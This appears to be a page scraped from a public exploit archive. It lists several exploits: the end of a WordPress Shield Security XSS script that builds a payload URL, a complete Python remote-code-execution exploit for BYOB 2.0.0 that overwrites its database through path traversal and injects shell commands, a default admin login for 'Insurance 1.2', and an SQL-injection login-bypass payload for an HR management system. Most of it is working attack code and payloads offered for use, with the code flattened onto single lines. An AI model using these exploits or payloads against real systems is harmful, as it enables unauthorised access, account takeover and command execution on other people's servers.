        # Display the hardcoded password  
        hardcoded_password = "HaxorStrongAFPassword123!!"  
        print(f"\n{yellow}Using hardcoded password: {hardcoded_password}{reset}")

        # Generate and display the XSS payload URL  
        xss_payload_url = generate_xss_payload(target_url, username, email, first_name, last_name)  
        print(f"\n{green}Generated XSS Payload URL: {xss_payload_url}{reset}")

    # Handle keyboard interruption  
    except KeyboardInterrupt:  
        print(f"\n{red}Script interrupted by user.{reset}")  
        sys.exit(1)  
    # Catch any other exceptions and display an error message  
    except Exception as e:  
        print(f"{red}An error occurred: {e}{reset}")  
        sys.exit(1)

WordPress Shield Security 20.0.5 Cross Site Scripting

Build Your Own Botnet (BYOB) version 2.0.0 exploit that works by spoofing an agent callback to overwrite the sqlite database and bypass authentication and exploiting an authenticated command injection in the payload builder page.

    # Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)# Date: 2024-08-14# Exploit Author: @_chebuya# Software Link: https://github.com/malwaredllc/byob# Version: v2.0.0# Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy# CVE: CVE-2024-?????, CVE-2024-?????# Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page# Github: # Blog: import sysimport jsonimport base64import stringimport randomimport argparseimport requestsfrom bs4 import BeautifulSoupdef get_csrf(session, url):    r = session.get(url)    soup = BeautifulSoup(r.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    return csrf_tokendef upload_database(session, url, filename):    with open('database.db', 'rb') as f:        bindata = f.read()    data = base64.b64encode(bindata).decode('ascii')    json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}    headers = {        'Content-Length': str(len(json.dumps(json_data)))    }    print("[***] Uploading database")    upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)    print(upload_response.status_code)    return upload_response.status_codedef exploit(url, username, password, user_agent, command):    s = requests.Session()    # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process    filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]    failed = True    for filepath in filepaths:        if upload_database(s, url, filepath) != 500:            failed = False            break    if failed:        print("[!!!] Failed to upload database, exiting")        sys.exit(1)    if password is None:        password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])    print(username + ":" + password)    register_csrf = get_csrf(s, f'{url}/register')    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = {        'csrf_token': register_csrf,        'username': username,        'password': password,        'confirm_password': password,        'submit': 'Sign Up'    }    print("[***] Registering user   ")    regsiter_response = s.post(f'{url}/register', headers=headers, data=data)    print(regsiter_response.status_code)    login_csrf = get_csrf(s, f'{url}/login')    data = {        'csrf_token': login_csrf,        'username': username,        'password': password,        'submit': 'Log In'    }    print("[***] Logging in")    login_response = s.post(f'{url}/login', headers=headers, data=data)    print(login_response.status_code)    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = f'format=exe&operating_system=nix$({command})&architecture=amd64'    try:        s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)    except requests.exceptions.ReadTimeout:        passparser = argparse.ArgumentParser()parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)args = parser.parse_args()exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)

Build Your Own Botnet 2.0.0 Remote Code Execution

Insurance version 1.2 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Insurance 1.2 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/insurance/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/insurance/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Insurance 1.2 Insecure Settings

Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 auth by pass Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user =  'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/hrm/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth